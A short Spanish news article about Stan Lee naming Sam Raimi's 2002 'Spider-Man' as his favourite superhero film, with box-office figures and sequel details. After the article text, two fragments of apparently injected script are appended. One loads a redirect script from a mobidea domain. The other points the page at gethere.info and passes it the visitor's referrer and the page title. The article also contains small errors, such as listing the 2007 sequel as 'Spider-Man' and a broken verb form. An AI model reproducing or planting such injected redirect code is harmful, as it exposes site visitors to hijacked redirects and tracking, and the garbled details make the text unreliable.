Stan Lee revela cual es su película favorita de superhéroes

Stan Lee, padre espiritual de la gran mayoría de personajes del universo cinematográfico de Marvel, ha confesado cual es la película de la que se siente más orgulloso hasta la fecha.
Para Stan Lee, el film más relevante de todos cuantos ha producido es “Spider-Man”, de Sam Raimi, la primera adaptación oficial al cine de las aventuras del Hombre Araña que se estrenó, con enorme éxito, en 2002.


“Después de aquella película, todo parecía mucho más fácil”, ha afirmado Lee, que además de ejercer como productor ejecutivo del film, apareció en un breve cameo durante la primera batalla entre Spider-Man y Duende Verde, en algo que se ha convertido en marca de estilo de todas las películas Marvel. Él, junto al dibujante Steve Ditko, creó al personaje en 1962. “Fue un gran éxito totalmente inesperado”, ha explica para justificar el por qué de su elección.
‘Spider-Man’ fue efectivamente un éxito sin precedentes. Con un presupuesto de 123 millones de euros logró recaudar 727 millones en todo el mundo. Tobey Maguire protagonizó un film que dio pie a dos secuelas: ‘Spider-Man 2’ (2004) y ‘Spider-Man’ (2007), ambas dirigidas de nuevo por Sam Raimi y con una acogida similar.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;